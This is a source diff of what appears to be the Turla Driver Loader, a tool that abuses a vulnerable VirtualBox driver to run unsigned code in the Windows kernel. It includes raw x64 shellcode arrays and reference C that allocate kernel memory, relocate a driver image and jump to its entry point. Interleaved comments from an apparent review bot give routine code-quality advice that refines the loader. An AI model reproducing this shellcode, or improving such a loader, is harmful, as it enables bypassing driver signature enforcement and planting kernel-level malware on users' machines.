@@ -575,14 +616,15 @@ HANDLE TDLStartVulnerableDriver( } } - //if vbox installed backup it driver, do it before dropping our + // + // If vbox installed backup it driver, do it before dropping our + // Ignore error if file not found + // if (g_VBoxInstalled) { if (supBackupVBoxDrv(FALSE) == FALSE) { cuiPrintText(g_ConOut, TEXT("Ldr: Error while doing VirtualBox driver backup"), g_ConsoleOutput, TRUE); - - break; } } @@ -717,7 +759,7 @@ void TDLStopVulnerableDriver( * */ UINT TDLProcessCommandLine( - LPWSTR lpCommandLine + _In_ LPWSTR lpCommandLine ) { UINT retVal = (UINT)-1; @@ -765,7 +807,7 @@ void TDLMain() UINT uResult = 0; DWORD dwTemp; LONG x; - OSVERSIONINFOW osv; + OSVERSIONINFO osv; WCHAR text[256]; __security_init_cookie(); @@ -795,7 +837,6 @@ void TDLMain() T_LOADERINTRO, g_ConsoleOutput, TRUE); - x = InterlockedIncrement((PLONG)&g_lApplicationInstances); if (x > 1) { cuiPrintText(g_ConOut, @@ -817,6 +858,8 @@ void TDLMain() break; } + g_NtBuildNumber = osv.dwBuildNumber; + _strcpy(text, TEXT("Ldr: Windows v")); ultostr(osv.dwMajorVersion, _strend(text)); _strcat(text, TEXT(".")); @@ -825,6 +868,10 @@ void TDLMain() ultostr(osv.dwBuildNumber, _strend(text)); cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + // + // If VirtualBox installed on the same machine warn user, + // however this is unnecessary can lead to any conflicts. + // g_VBoxInstalled = TDLVBoxInstalled(); if (g_VBoxInstalled) { cuiPrintText(g_ConOut, diff --git a/Source/Furutaka/resource.rc b/Source/Furutaka/resource.rc index 351f442..9b6d71f 100644 Binary files a/Source/Furutaka/resource.rc and b/Source/Furutaka/resource.rc differ diff --git a/Source/Furutaka/shellcode.h b/Source/Furutaka/shellcode.h index 469aa42..8bf5be4 100644 --- a/Source/Furutaka/shellcode.h +++ b/Source/Furutaka/shellcode.h @@ -4,9 +4,9 @@ * * TITLE: SHELLCODE.H * -* VERSION: 1.10 +* VERSION: 1.11 * -* DATE: 17 Apr 2017 +* DATE: 20 Apr 2017 * * Loader bootstrap shellcode. * 
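Review bot: The new comment says the error is ignored only when the file is not found, but the code below ignores every failure of `supBackupVBoxDrv(FALSE)`: the `break` is gone and no error code is inspected, so a backup that fails for another reason (access denied, disk full, sharing violation) now lets the loader continue and replace the user's VirtualBox driver with no copy to restore from. If `supBackupVBoxDrv` exposes the cause (its contract is not on this page), make the continue conditional on a not-found result, e.g. `if (supBackupVBoxDrv(FALSE) == FALSE && GetLastError() != ERROR_FILE_NOT_FOUND) break;` assuming the helper preserves the last error; otherwise reword the comment to say that all backup errors are ignored, so the comment and the behaviour agree. The enclosing TDLStartVulnerableDriver continues beyond this hunk.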
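Review bot: The added comment `however this is unnecessary can lead to any conflicts` above `g_VBoxInstalled = TDLVBoxInstalled();` is ungrammatical and leaves the reader guessing what is unnecessary; `// Warn the user if VirtualBox is installed on this machine: running the loader alongside it is not required and may cause conflicts.` states the apparent intent, assuming that is what was meant. `g_NtBuildNumber = osv.dwBuildNumber;` in the hunk above is the only place the global is assigned, and TDLMapDriver keys its code paths on it; a one-line comment there, `// TDLMapDriver selects its code path by this build number.`, makes that dependency visible from TDLMain. The `OSVERSIONINFOW` → `OSVERSIONINFO` change is neutral under a UNICODE build but is the kind of silent type swap worth a word in the commit message.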
@@ -22,8 +22,7 @@ typedef PVOID(NTAPI *PfnExAllocatePoolWithTag)( _In_ POOL_TYPE PoolType, _In_ SIZE_T NumberOfBytes, - _In_ ULONG Tag - ); + _In_ ULONG Tag); typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)( _Out_ PHANDLE ThreadHandle, @@ -32,8 +31,14 @@ typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)( _In_opt_ HANDLE ProcessHandle, _Out_opt_ PCLIENT_ID ClientId, _In_ PKSTART_ROUTINE StartRoutine, - _In_opt_ PVOID StartContext - ); + _In_opt_ PVOID StartContext); + +typedef NTSTATUS (NTAPI *PfnZwClose)( + _In_ HANDLE Handle); + +typedef NTSTATUS(NTAPI *PfnDriverEntry)(); + +#define MAX_SHELLCODE_LENGTH 0x300 /* * TDLBootstrapLoader @@ -46,10 +51,11 @@ typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)( /* void TDLBootstrapLoader( PfnExAllocatePoolWithTag ExAllocatePoolWithTag, - PfnPsCreateSystemThread PsCreateSystemThread) + PfnPsCreateSystemThread PsCreateSystemThread, + PfnZwClose ZwClose) { ULONG_PTR pos, exbuffer, - Image = ((ULONG_PTR)&TDLBootstrapLoader) + 0x200; + Image = ((ULONG_PTR)&TDLBootstrapLoader) + MAX_SHELLCODE_LENGTH; PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image; PIMAGE_FILE_HEADER fileh = 
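Review bot: `typedef NTSTATUS(NTAPI *PfnDriverEntry)();` declares a pointer to an unprototyped function; in C an empty `()` means "unspecified arguments", so write `typedef NTSTATUS(NTAPI *PfnDriverEntry)(VOID);` to match the zero-argument call made through it in the reference source. `#define MAX_SHELLCODE_LENGTH 0x300` is introduced without a comment although both reference sources (`Image = ... + MAX_SHELLCODE_LENGTH`) and the loader's `dataOffset` depend on its exact value; `// Bytes reserved for the bootstrap code; the mapped image follows at this offset.` would document the contract. Spacing is inconsistent between `typedef NTSTATUS (NTAPI *PfnZwClose)` and `typedef NTSTATUS(NTAPI *PfnDriverEntry)`; pick one form for the three new typedefs.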
@@ -110,36 +116,148 @@ void TDLBootstrapLoader( for (pos = 0; pos < isz; pos++) ((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos]; + th = NULL; InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL); - PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL, - (PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL); + if (NT_SUCCESS(PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL, + (PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL))) + { + ZwClose(th); + } } */ -static const unsigned char TDLBootstrapLoader_code[415] = { - 0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2, - 0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF, - 0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, - 0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, - 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00, - 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, - 0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, - 0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, - 0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, - 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00, +const unsigned char TDLBootstrapLoader_code[480] = { + 0x48, 0x8B, 0xC4, 0x41, 0x54, 0x48, 0x81, 0xEC, 0x90, 0x00, 0x00, 0x00, 0x48, 0x89, 0x58, 0x10, + 0x4D, 0x8B, 0xE0, 0x48, 0x89, 0x68, 0x18, 0x48, 0x8D, 0x1D, 0xE2, 0xFF, 0xFF, 0xFF, 0x4C, 0x89, + 0x68, 0xE8, 0x48, 0x81, 0xC3, 0x00, 0x03, 0x00, 0x00, 0x4C, 0x89, 0x70, 0xE0, 0x4C, 0x8B, 0xEA, + 0x4C, 0x89, 0x78, 0xD8, 0x4C, 0x8B, 0xC9, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 
0x6C, 0x53, 0x4C, + 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, 0x10, 0x00, + 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xC9, 0x48, 0x8D, 0xA8, 0x00, 0x10, 0x00, 0x00, 0x48, 0x81, + 0xE5, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, 0x86, 0xB0, + 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, 0xA1, 0x00, + 0x00, 0x00, 0x48, 0x89, 0xB4, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, 0x41, 0x8B, + 0xB6, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDD, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, 0xBC, 0x24, + 0x88, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xF9, 0x85, 0xF6, 0x74, 0x68, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43, 0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9, 0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C, 0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48, - 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0, - 0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, - 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48, - 0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, + 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFE, 0x72, 0xA0, + 0x45, 0x33, 0xC9, 0x48, 0x8B, 0xB4, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0x88, + 0x00, 0x00, 0x00, 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0x7C, 0x24, 0x70, 0x48, 0xC1, 0xEA, 0x03, 0x48, + 0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCD, 0x48, 0x2B, 0xDD, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x48, 0x8B, 0x04, 0x0B, 0x48, 
0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75, - 0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44, - 0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58, - 0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24, - 0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6, - 0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41, - 0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3 + 0xEF, 0x4C, 0x89, 0x4C, 0x24, 0x30, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0x4C, 0x89, 0x8C, 0x24, 0xA0, + 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x4C, 0x24, 0x48, + 0x0F, 0x57, 0xC0, 0x4C, 0x89, 0x4C, 0x24, 0x50, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0xF3, 0x0F, 0x7F, + 0x44, 0x24, 0x60, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x58, 0x00, + 0x02, 0x00, 0x00, 0x41, 0x8B, 0x46, 0x28, 0x48, 0x03, 0xC5, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, + 0x89, 0x4C, 0x24, 0x20, 0x45, 0x33, 0xC9, 0x41, 0xFF, 0xD5, 0x4C, 0x8B, 0x74, 0x24, 0x78, 0x4C, + 0x8B, 0xAC, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xAC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x48, + 0x8B, 0x9C, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x85, 0xC0, 0x78, 0x0B, 0x48, 0x8B, 0x8C, 0x24, 0xA0, + 0x00, 0x00, 0x00, 0x41, 0xFF, 0xD4, 0x48, 0x81, 0xC4, 0x90, 0x00, 0x00, 0x00, 0x41, 0x5C, 0xC3 +}; + + +/* +* TDLBootstrapLoader_w10rs2 +* +* Purpose: +* +* Main part of shellcode used to execute driver code since w10rs2. 
+* +*/ +/* +void TDLBootstrapLoader_w10rs2( + PfnExAllocatePoolWithTag ExAllocatePoolWithTag +) +{ + ULONG_PTR pos, exbuffer, + Image = ((ULONG_PTR)&TDLBootstrapLoader_w10rs2) + MAX_SHELLCODE_LENGTH; + + PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image; + PIMAGE_FILE_HEADER fileh = + (PIMAGE_FILE_HEADER)(Image + sizeof(DWORD) + dosh->e_lfanew); + + PIMAGE_OPTIONAL_HEADER popth = + (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER)); + + PfnDriverEntry DriverEntry; + + ULONG isz = popth->SizeOfImage; + + PIMAGE_BASE_RELOCATION rel; + DWORD_PTR delta; + LPWORD chains; + DWORD c, p, rsz; + + exbuffer = (ULONG_PTR)ExAllocatePoolWithTag( + NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE; + exbuffer &= ~(PAGE_SIZE - 1); + + if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) + if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) + { + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + + popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); + + rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; + delta = (DWORD_PTR)exbuffer - popth->ImageBase; + c = 0; + + while (c < rsz) { + p = sizeof(IMAGE_BASE_RELOCATION); + chains = (LPWORD)((PBYTE)rel + p); + + while (p < rel->SizeOfBlock) { + + switch (*chains >> 12) { + case IMAGE_REL_BASED_HIGHLOW: + *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; + break; + case IMAGE_REL_BASED_DIR64: + *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; + break; + } + + chains++; + p += sizeof(WORD); + } + + c += rel->SizeOfBlock; + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); + } + } + + isz >>= 3; + for (pos = 0; pos < isz; pos++) + ((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos]; + + DriverEntry = (PfnDriverEntry)(exbuffer + popth->AddressOfEntryPoint); + DriverEntry(); +} +*/ + +static const unsigned char TDLBootstrapLoader_code_w10rs2[321] = { + 0x40, 0x53, 
0x55, 0x56, 0x48, 0x83, 0xEC, 0x20, 0x4C, 0x8B, 0xC9, 0x4C, 0x89, 0x7C, 0x24, 0x50, + 0x48, 0x8D, 0x1D, 0xE9, 0xFF, 0xFF, 0xFF, 0x33, 0xC9, 0x48, 0x81, 0xC3, 0x00, 0x03, 0x00, 0x00, + 0x41, 0xB8, 0x54, 0x64, 0x6C, 0x53, 0x48, 0x63, 0x6B, 0x3C, 0x48, 0x03, 0xEB, 0x44, 0x8B, 0x7D, + 0x50, 0x41, 0x8D, 0x97, 0x00, 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x48, 0x8D, 0xB0, 0x00, 0x10, + 0x00, 0x00, 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x83, 0xBD, 0x84, 0x00, 0x00, 0x00, 0x05, + 0x0F, 0x86, 0xA5, 0x00, 0x00, 0x00, 0x8B, 0x8D, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, + 0x97, 0x00, 0x00, 0x00, 0x48, 0x89, 0x7C, 0x24, 0x40, 0x4C, 0x8D, 0x04, 0x0B, 0x4C, 0x8B, 0xDE, + 0x4C, 0x89, 0x74, 0x24, 0x48, 0x4C, 0x2B, 0x5D, 0x30, 0x33, 0xFF, 0x44, 0x8B, 0xB5, 0xB4, 0x00, + 0x00, 0x00, 0x45, 0x85, 0xF6, 0x74, 0x6A, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43, + 0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9, + 0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C, + 0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, + 0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48, + 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x41, 0x3B, 0xFE, 0x72, + 0x9F, 0x48, 0x8B, 0x7C, 0x24, 0x40, 0x4C, 0x8B, 0x74, 0x24, 0x48, 0x49, 0x8B, 0xD7, 0x4C, 0x8B, + 0x7C, 0x24, 0x50, 0x48, 0xC1, 0xEA, 0x03, 0x48, 0x85, 0xD2, 0x74, 0x25, 0x48, 0x8B, 0xCE, 0x48, + 0x2B, 0xDE, 0x0F, 0x1F, 0x40, 0x00, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75, + 0xEF, 0x8B, 0x45, 0x28, 0x48, 0x03, 0xC6, 0x48, 0x83, 0xC4, 0x20, 0x5E, 0x5D, 0x5B, 0x48, 0xFF, + 0xE0 }; 
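Review bot: `TDLBootstrapLoader_code` is now defined as `const unsigned char TDLBootstrapLoader_code[480] = {` without `static`, while the new `TDLBootstrapLoader_code_w10rs2` keeps `static const` and the definition being replaced was `static const` as well. In C a file-scope `const` object has external linkage, so a header that defines it produces a duplicate symbol the moment it is included from a second translation unit, and the two sibling arrays should not differ in linkage in any case; restore `static const unsigned char TDLBootstrapLoader_code[480] = {`. The `/* ... */`-wrapped reference source for `TDLBootstrapLoader_w10rs2` is helpful; a one-line comment above each byte array naming the compiler and options it was produced with would let a reader re-derive the bytes from the reference source.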
diff --git a/TDL.sha256 b/TDL.sha256 index 8a8ffcf..fd98132 100644 --- a/TDL.sha256 +++ b/TDL.sha256 
@@ -1,32 +1,32 @@
-c371453e2eb9edab0949472d14871f09a6c60e4bab647910da83943bb4d3104c *Compiled\dummy.sys
-4c8d13b1693c77bc4b75ae0f6262260cbc1478f3da33d039930d265db5d7eb3e *Compiled\dummy2.sys
-9c81608bea1766f195ddf49f9a07b23da96dbf17a5e2d66405492eaa3155996e *Compiled\Furutaka.exe
-c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln
-01662c807519eac05d7082c151be3824418ccf1716216895680fe5598093d245 *Source\DummyDrv\dummy\dummy.vcxproj
+a761bbb4a1b7813132dc8d8ed526d24289dc603bc706da238e1f23d75dbd66aa *Compiled\dummy.sys
+f6610691bc3b9f96dad8bfc00b3ceb939ebcb17844d1ca5ee26f8364944ca110 *Compiled\dummy2.sys
+bef3056b55e2f29525817e3e44753dcf32152460028d27b28e54cce3a7d1eb0f *Compiled\Furutaka.exe
+14eec2753d0e9b432c54c4a70fc59e3be75674313b6308a7a820e6682f775eb9 *Source\DummyDrv\dummy.sln
+d61ebda2674d2db05a235478f89fed02c2de049b00ac5648fcebd4c4e638f71c *Source\DummyDrv\dummy\dummy.vcxproj
 2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters
 d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv\dummy\dummy.vcxproj.user
-da9e4121c5a6970b0e10e6cca6fa6065e758f5b54b46c33ff99e7f98d98d00bc *Source\DummyDrv\dummy\main.c
-c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln
-2fd78ce2843d7c77b1249bb7288d87605a4b3979b150a982eae56ecbabdcfb32 *Source\DummyDrv2\dummy\dummy.vcxproj
+4c86a0477e8f21e81bc6651bc06cea26241fc5b9a033e64c3cd843267fc98575 *Source\DummyDrv\dummy\main.c
+14eec2753d0e9b432c54c4a70fc59e3be75674313b6308a7a820e6682f775eb9 *Source\DummyDrv2\dummy.sln
+f9a718ca087a1dce71638855837c464b190b7310f8e6715fc4471ed2b85af27d *Source\DummyDrv2\dummy\dummy.vcxproj
 f53e8133a9d12b751445ed57f4574bbeba722d26096196f544ed1794adf699f4 *Source\DummyDrv2\dummy\dummy.vcxproj.filters
 d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv2\dummy\dummy.vcxproj.user
-a23f846a6321b8e411dce50c61c5d2675ee7dc6fef0e3b69d8a671120cd27b76 *Source\DummyDrv2\dummy\main.c
-cc5dab13546ffcb16e97b664783e6a9121c99f89ece7dd63300714246e9622fa *Source\DummyDrv2\dummy\main.h
+1e73ce5b6b079e6986509c218ce0880536b37c505056f831989e73b835c1cbbc *Source\DummyDrv2\dummy\main.c
+f0732da25aa6b0a64eb0ebfc730c0902ed6fd1cc51f43f66813adbc5283de6ec *Source\DummyDrv2\dummy\main.h
 10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c
 e25d0088a6c73c51243aac3a21e9384b24844e54f0a093d75fbf0ef44c2ff83d *Source\Furutaka\cui.c
 6f145796c9bb2bd9413fe12926436c04cc0dd596be716d7423150299b39d02a0 *Source\Furutaka\cui.h
 24bd86affa81071e8e4ba82368e6004ede1c4dd5234c21098c4e7563ee25721a *Source\Furutaka\Furutaka.sln
-16bd5cb1f9114683a8f5b91d8f5492319b64f5b1dd5103b56c9c29c39b06237b *Source\Furutaka\Furutaka.vcxproj
+656a1ebfb8ca2b136b446d8bdeac9618d27ae1f6e06c08dee0d2fb8885b0e3a1 *Source\Furutaka\Furutaka.vcxproj
 b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters
 b4d5fe6532f439d6c1161b06dfe90a6bee063c003645204d31b678efd033ae51 *Source\Furutaka\Furutaka.vcxproj.user
-1a80c208b491fcd2704761490a12067ae8aa73d8bde834a20920cbd231affaf7 *Source\Furutaka\global.h
+9b9f412b442a3a328693af6f6be5bc3f00b0723e49012e6395d3d5eb9184b078 *Source\Furutaka\global.h
 94cbbb81022dbd0205a3e7ede89775b43f9f45e934a3079fdb7f5217d8794fe0 *Source\Furutaka\instdrv.c
 33b8666748f027ff93707e6e2a1b52303c3664399000ff18b4a8fe864b731640 *Source\Furutaka\instdrv.h
-c1747f460d8e42e18f3fce8c30c51be75fe382332f586756bbb86af81e8a5a45 *Source\Furutaka\main.c
+2e0ae7d721d15facb6a63af2df430ce5a1d6250fdb78fc7511e24c23a2d73a9a *Source\Furutaka\main.c
 8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h
 fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h
-2dad59a7d37bfc28fc1e0f3599584454084e5837649facde829373f41b86e08f *Source\Furutaka\resource.rc
-f8cafd307ba14b60970fe8caf73fbb2f178d3877a3d8b51f507b431e3bf5506e *Source\Furutaka\shellcode.h
+2ae545acec81745467b20da56f88a31df07de2021456d82dc16dbbe9ce0b3103 *Source\Furutaka\resource.rc
+6f8ae02b3a6da025d5f918080e70245760d472dd5eb23fcc3964d425bee41336 *Source\Furutaka\shellcode.h
 fd0fc26c051a852fe3eaf9cb44615543b92e642274fc1eb58b53f23457fd4e89 *Source\Furutaka\sup.c
 059014233efa8963d28b21f77aa37ae1c0ed3e152a9737ae8ec45338dee1d860 *Source\Furutaka\sup.h
 12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h
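Review bot: The refreshed digests for `Compiled\dummy.sys`, `Compiled\dummy2.sys` and `Compiled\Furutaka.exe` are committed in the same change as the binaries they describe, so TDL.sha256 is self-attesting: anyone able to replace a binary in the tree can rewrite its line here, and the manifest will detect accidental corruption but not tampering. If the file is meant as an integrity reference for people downloading the prebuilt loader and drivers, a detached signature over the manifest (or over a release tag) kept outside the tree is what would actually let a consumer verify it. It would also help to state the intended use in a one-line comment at the top of the manifest, e.g. `# sha256sum -b output; regenerate after every rebuild of Compiled\*` so the next maintainer knows when it must be refreshed. Whether a publishing-side signing step already exists is not visible from this diff.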